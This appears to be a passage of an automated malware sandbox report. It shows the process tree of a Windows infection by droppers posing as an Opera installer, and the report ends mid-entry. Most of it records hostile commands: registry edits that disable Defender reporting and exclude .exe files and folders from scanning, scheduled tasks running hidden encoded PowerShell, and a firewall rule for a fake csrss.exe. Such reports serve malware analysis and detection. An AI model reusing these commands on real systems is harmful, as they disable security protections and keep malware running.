                                                          C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2cc,0x6d619558,0x6d619564,0x6d619570
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:924
                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:3524
                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\assistant_installer.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\assistant_installer.exe" --version
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:3516
                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\assistant_installer.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xdc2614,0xdc2620,0xdc262c
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:4552
                                                    • C:\Users\Admin\Pictures\ftIGodt38l1A0el3gsSuEKzA.exe
                                                      "C:\Users\Admin\Pictures\ftIGodt38l1A0el3gsSuEKzA.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:212
                                                    • C:\Users\Admin\Pictures\ModJdN8jNVnymd9XGEFiFx7U.exe
                                                      "C:\Users\Admin\Pictures\ModJdN8jNVnymd9XGEFiFx7U.exe" /VERYSILENT
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3828
                                                    • C:\Users\Admin\Pictures\7nbYV20XbAUjbnnHzTZl4oOU.exe
                                                      "C:\Users\Admin\Pictures\7nbYV20XbAUjbnnHzTZl4oOU.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2320
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC237.tmp\Install.exe
                                                        .\Install.exe
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2060
                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC505.tmp\Install.exe
                                                          .\Install.exe /mGaXdidI "385118" /S
                                                          5⤵
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Checks for any installed AV software in registry
                                                          • Drops file in System32 directory
                                                          • Enumerates system info in registry
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2756
                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                            6⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:424
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                              7⤵
                                                                PID:2636
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                  8⤵
                                                                    PID:2188
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                6⤵
                                                                  PID:4596
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                    7⤵
                                                                      PID:2536
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                        8⤵
                                                                          PID:4712
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                          8⤵
                                                                            PID:3836
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "gljlSwDtk" /SC once /ST 02:37:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                        6⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:2188
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "gljlSwDtk"
                                                                        6⤵
                                                                          PID:4916
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /DELETE /F /TN "gljlSwDtk"
                                                                          6⤵
                                                                            PID:352
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /CREATE /TN "bwKBwqZYjkqxftWshF" /SC once /ST 03:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HbyLpiR.exe\" cj /Alsite_idxfn 385118 /S" /V1 /F
                                                                            6⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:4972
                                                                    • C:\Users\Admin\Pictures\UYUnAyqE2cpLDpQgWoHzWPCg.exe
                                                                      "C:\Users\Admin\Pictures\UYUnAyqE2cpLDpQgWoHzWPCg.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:1544
                                                                • C:\Users\Admin\AppData\Local\Temp\is-36KFH.tmp\ModJdN8jNVnymd9XGEFiFx7U.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-36KFH.tmp\ModJdN8jNVnymd9XGEFiFx7U.tmp" /SL5="$70208,831488,831488,C:\Users\Admin\Pictures\ModJdN8jNVnymd9XGEFiFx7U.exe" /VERYSILENT
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Windows directory
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:4380
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                  1⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5092
                                                                  • C:\Windows\system32\gpupdate.exe
                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                    2⤵
                                                                      PID:216
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                    1⤵
                                                                      PID:832
                                                                    • \??\c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                      1⤵
                                                                        PID:2784
                                                                      • \??\c:\windows\system32\gpscript.exe
                                                                        gpscript.exe /RefreshSystemParam
                                                                        1⤵
                                                                          PID:4236
                                                                        • C:\Windows\system32\netsh.exe
                                                                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                          1⤵
                                                                          • Modifies Windows Firewall
                                                                          PID:2812
                                                                        • C:\Windows\windefender.exe
                                                                          C:\Windows\windefender.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:4840
                                                                        • C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HbyLpiR.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HbyLpiR.exe cj /Alsite_idxfn 385118 /S
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in System32 directory
                                                                          PID:4664
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                            2⤵
                                                                              PID:520
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:3900
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                    4⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2660
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:60
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                    3⤵
                                                                                      PID:2644
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                        PID:4420
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                        • Drops file in System32 directory
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4996
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:2388
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:4936
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:1976
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:2780
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:1172
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:3100
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:3296
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:4460
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:4392
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:2560
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:4368
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:208
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:4820
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:1944
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:968
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:4088
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:2148
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:1428
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:1088
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:3364
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:2736
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:2568
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:5080
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FohpjzYDshfCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FohpjzYDshfCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IoHaAJhEDYhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IoHaAJhEDYhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KCGdmeQdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KCGdmeQdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hgFvgKbJayUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hgFvgKbJayUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uqeRQcQeSVSWnHVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uqeRQcQeSVSWnHVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RZfGRCgJsrDIEOco\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RZfGRCgJsrDIEOco\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                    2⤵
                                                                                                                                      PID:2584
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:192
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            4⤵
                                                                                                                                              PID:1316
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
